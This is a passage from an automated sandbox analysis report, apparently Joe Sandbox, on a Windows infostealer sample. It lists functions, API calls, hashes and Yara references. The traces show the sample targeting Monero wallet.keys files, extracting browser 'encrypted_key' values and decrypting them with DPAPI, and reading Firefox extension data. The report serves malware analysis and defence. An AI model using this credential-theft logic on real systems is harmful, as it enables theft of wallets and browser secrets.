                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 432fb8e58e7396775408b09a2b28abddae79210997b93a1b536e925789e7dbbf
                        • Instruction ID: 1509a5b550616f024c08898b4193b00db2492c2c2d3a557289282e625d49c168
                        • Opcode Fuzzy Hash: 432fb8e58e7396775408b09a2b28abddae79210997b93a1b536e925789e7dbbf
                        • Instruction Fuzzy Hash: BC9126758101189BDB04FBA2DC92EEE7338BF14301F544269F917B6091EF346A8DEB66
                        Function 00C4D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4D801
                        • lstrlen.KERNEL32(00000000), ref: 00C4D99F
                        • lstrlen.KERNEL32(00000000), ref: 00C4D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 298823f31d94dee4a372aaabe7d6f610075b02b3fa935b124190f9664faf9319
                        • Instruction ID: 349b9625bf9af3457e0b5e6a24aff6fc9145ba1033a0554064c2a0ce40ea9b38
                        • Opcode Fuzzy Hash: 298823f31d94dee4a372aaabe7d6f610075b02b3fa935b124190f9664faf9319
                        • Instruction Fuzzy Hash: 2F8134759101189BDB04FBA2DC92EEE7338BF14301F544229F907B6091EF346A4DEB66
                        Function 00C4F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C61580,00C60D92), ref: 00C4F54C
                        • lstrlen.KERNEL32(00000000), ref: 00C4F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: 93a1fa5929f41e64808df0e31450597f57bf25fa22bfa728ffac952daa762e78
                        • Instruction ID: a4f9ba5c975d13efc507d768464edcbb1925f64ccda707c23e2c7c25abb0191c
                        • Opcode Fuzzy Hash: 93a1fa5929f41e64808df0e31450597f57bf25fa22bfa728ffac952daa762e78
                        • Instruction Fuzzy Hash: AB513079D10108AADB04FBB1DC92DED7738BF54301F408628FC16A7191EE346A4DEBA6
                        Function 00C53560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: b3f24be2456e15c17423d20275c23479907df6bba8043813fcc9ae4829816dcf
                        • Instruction ID: a3023d21b7ac51e91c425dd2db176db04c19d7059b535699f6fc10cd5f9c70fe
                        • Opcode Fuzzy Hash: b3f24be2456e15c17423d20275c23479907df6bba8043813fcc9ae4829816dcf
                        • Instruction Fuzzy Hash: E8414075D10108AFCB04EFE5C885AEEB774BF54305F148128F816B6290EB74AA49DFA6
                        Function 00C49CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C49D39
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49AEF
                          • Part of subcall function 00C49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C44EEE,00000000,?), ref: 00C49B01
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49B2A
                          • Part of subcall function 00C49AC0: LocalFree.KERNEL32(?,?,?,?,00C44EEE,00000000,?), ref: 00C49B3F
                          • Part of subcall function 00C49B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C49B84
                          • Part of subcall function 00C49B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C49BA3
                          • Part of subcall function 00C49B60: LocalFree.KERNEL32(?), ref: 00C49BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: d725f8ec1e95f454aeab64fcd3265e00e6659fba28c7e31f6a6938a8a40e67e3
                        • Instruction ID: 8952294d41e2220ed0f5897229ae6bc3fa17ccb6c29567181b26e9ba684a2031
                        • Opcode Fuzzy Hash: d725f8ec1e95f454aeab64fcd3265e00e6659fba28c7e31f6a6938a8a40e67e3
                        • Instruction Fuzzy Hash: A3315EB6D10219ABCF14DFE4DC85AEFB7B8FF48304F144529E915A7241EB309A44CBA1
                        Function 00C592E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00C53AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C53AEE,?), ref: 00C592FC
                        • GetFileSizeEx.KERNEL32(000000FF,00C53AEE), ref: 00C59319
                        • CloseHandle.KERNEL32(000000FF), ref: 00C59327
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: f979b68b68772fdd1d0ed049cfa1a73528468470da641a32f2bf7b3cc1e018f5
                        • Instruction ID: a587b3bb16fcd87ed79efd9541982c49523305a33b34266eae4dfbb9e288273a
                        • Opcode Fuzzy Hash: f979b68b68772fdd1d0ed049cfa1a73528468470da641a32f2bf7b3cc1e018f5
                        • Instruction Fuzzy Hash: A0F08C38E00208FFEB10DBB2DC08B9E77B9EB48311F1082A5BA15A72D0D6B196449B44
                        Function 00C5C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 00C5C74E
                          • Part of subcall function 00C5BF9F: __amsg_exit.LIBCMT ref: 00C5BFAF
                        • __getptd.LIBCMT ref: 00C5C765
                        • __amsg_exit.LIBCMT ref: 00C5C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00C5C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 7006e327c021dfb056fddafb93acda1549dc721f1f4a7b6928d3e5de7bf4caee
                        • Instruction ID: 977b8a299ad47eed96c31615c783949ad15d82ed7c217d5e7076bd814f410788
                        • Opcode Fuzzy Hash: 7006e327c021dfb056fddafb93acda1549dc721f1f4a7b6928d3e5de7bf4caee
                        • Instruction Fuzzy Hash: B7F0903E9007109FD730BBF9588674D37A0AF04767F244249FC14A65D2CB645EC8AE5E
                        Function 00C54F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54F7A
                        • lstrcat.KERNEL32(?,00C61070), ref: 00C54F97
                        • lstrcat.KERNEL32(?,0089AFA8), ref: 00C54FAB
                        • lstrcat.KERNEL32(?,00C61074), ref: 00C54FBD
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C5492C
                          • Part of subcall function 00C54910: FindFirstFileA.KERNEL32(?,?), ref: 00C54943
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FDC), ref: 00C54971
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FE0), ref: 00C54987
                          • Part of subcall function 00C54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C54B7D
                          • Part of subcall function 00C54910: FindClose.KERNEL32(000000FF), ref: 00C54B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 224ea9e827efa9a4e69a9487d4ba49663ca17ad8862bdcdb2e723e9f089a99ae
                        • Instruction ID: 23de9faaf882eb411cfe1f18e29827abc2adf7f85e66123170c2a56fe241678f
                        • Opcode Fuzzy Hash: 224ea9e827efa9a4e69a9487d4ba49663ca17ad8862bdcdb2e723e9f089a99ae
                        • Instruction Fuzzy Hash: 0021DD7A9002046BD754FBB0DC47EED333CA754701F044565BA9DA2181EE7496CC9BA2